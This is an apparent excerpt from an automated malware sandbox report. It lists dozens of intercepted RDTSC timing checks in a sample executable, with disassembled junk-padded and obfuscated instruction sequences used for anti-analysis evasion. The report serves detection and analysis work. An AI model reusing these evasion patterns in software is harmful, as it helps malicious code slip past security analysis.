                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE3C38 second address: BE3C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2A91294716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C4D second address: BE8C5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F2A913FCE96h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C5F second address: BE8C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE3CEC second address: BE3D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C64 second address: BE8C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE6C50 second address: BE6C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F2A913FCEAEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C6A second address: BE8C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8C6E second address: BE8C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE6C77 second address: BE6C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BE8ECC second address: BE8ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF31F1 second address: BF31F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF2C1E second address: BF2C28 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A913FCE9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B83395 second address: B8339D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF78F3 second address: BF78F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF7A2D second address: BF7A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007F2A9129471Fh 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF7A47 second address: BF7A73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F2A913FCEA4h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F2A913FCE96h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF7A73 second address: BF7A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF91C8 second address: BF91CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF91CE second address: BF91D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BF91D2 second address: BF91D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFFE5C second address: BFFE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF114 second address: BFF136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F2A913FCE96h 0x00000009 pop eax 0x0000000a jo 00007F2A913FCE9Ch 0x00000010 jg 00007F2A913FCE96h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jo 00007F2A913FCE96h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF136 second address: BFF13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF13A second address: BFF144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF144 second address: BFF14C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF2AF second address: BFF2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF2B5 second address: BFF2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F2A91294724h 0x0000000e jnc 00007F2A91294716h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFF9F1 second address: BFFA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCEA0h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFFA0A second address: BFFA24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFFA24 second address: BFFA37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A913FCE9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFFA37 second address: BFFA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F2A91294716h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BFFA46 second address: BFFA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B86727 second address: B8674F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F2A91294720h 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F2A9129471Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C07217 second address: C0721D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0721D second address: C0723B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F2A9129471Ch 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F2A91294716h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0723B second address: C07244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C06DDE second address: C06DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C07DF6 second address: C07E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A913FCEA2h 0x0000000a jmp 00007F2A913FCEA7h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C07E2D second address: C07E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F2A9129471Fh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C07E4B second address: C07E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0CA77 second address: C0CA7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0B9A4 second address: C0B9BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F2A913FCE96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F2A913FCE96h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0B9BA second address: C0B9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD4E6F second address: BAE4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, dword ptr [ebp+122D1C9Bh] 0x00000011 lea eax, dword ptr [ebp+1248FC21h] 0x00000017 sub dword ptr [ebp+122D2765h], edi 0x0000001d push eax 0x0000001e jng 00007F2A913FCEABh 0x00000024 push eax 0x00000025 jmp 00007F2A913FCEA3h 0x0000002a pop eax 0x0000002b mov dword ptr [esp], eax 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F2A913FCE98h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 call dword ptr [ebp+12464D0Eh] 0x0000004e jc 00007F2A913FCEA0h 0x00000054 jmp 00007F2A913FCE9Ah 0x00000059 push eax 0x0000005a push edx 0x0000005b jno 00007F2A913FCE9Eh 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD5062 second address: BD5066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD5392 second address: BD53A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD53A6 second address: BD53B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD5483 second address: BD549E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCEA0h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD549E second address: BD54BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A91294716h 0x0000000a popad 0x0000000b jmp 00007F2A9129471Ah 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD54BD second address: BD54C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD54C2 second address: BD550B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F2A91294718h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edx, 60E64500h 0x00000029 call 00007F2A91294719h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jns 00007F2A91294716h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD550B second address: BD553E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jp 00007F2A913FCEA7h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007F2A913FCE96h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD553E second address: BD556A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A91294718h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jl 00007F2A91294716h 0x00000015 jmp 00007F2A91294724h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD57B2 second address: BD57CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD596E second address: BD5972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD5972 second address: BD59A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e jnc 00007F2A913FCE9Ch 0x00000014 add ch, 00000013h 0x00000017 push 00000004h 0x00000019 or dword ptr [ebp+122D3876h], eax 0x0000001f mov ecx, dword ptr [ebp+122D3A01h] 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD59A4 second address: BD59A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD59A8 second address: BD59AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD59AE second address: BD59C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F2A91294716h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F2A9129471Ch 0x00000015 jc 00007F2A91294716h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD6098 second address: BD60D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jns 00007F2A913FCEADh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F2A913FCE9Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD60D7 second address: BD60F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD60F1 second address: BD60F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD6191 second address: BD619A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD619A second address: BD61E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F2A913FCE98h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+1248FC65h] 0x0000002a jmp 00007F2A913FCE9Eh 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F2A913FCE9Bh 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD61E4 second address: BD61EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD61EB second address: BD6261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F2A913FCEA6h 0x0000000e nop 0x0000000f mov dword ptr [ebp+1245759Bh], ebx 0x00000015 lea eax, dword ptr [ebp+1248FC21h] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F2A913FCE98h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D330Bh], eax 0x0000003b or ecx, 112B1422h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 je 00007F2A913FCEA9h 0x0000004a jmp 00007F2A913FCEA3h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BD6261 second address: BAF05D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2A91294727h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F2A91294718h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov cx, ax 0x0000002b call dword ptr [ebp+122D216Eh] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 pop eax 0x00000037 push edx 0x00000038 pop edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BAF05D second address: BAF063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BAF063 second address: BAF069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BAF069 second address: BAF078 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0BC88 second address: C0BC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2A91294716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0BC92 second address: C0BC98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0C3DC second address: C0C3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0C3E2 second address: C0C3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C0C6D0 second address: C0C6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C15B8E second address: C15B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C15B92 second address: C15B9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A91294716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C15D25 second address: C15D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C15D2D second address: C15D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2A91294716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C15ED0 second address: C15ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C15ED6 second address: C15EE0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A91294722h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C15EE0 second address: C15EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C16484 second address: C16498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F2A91294716h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C16498 second address: C1649E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
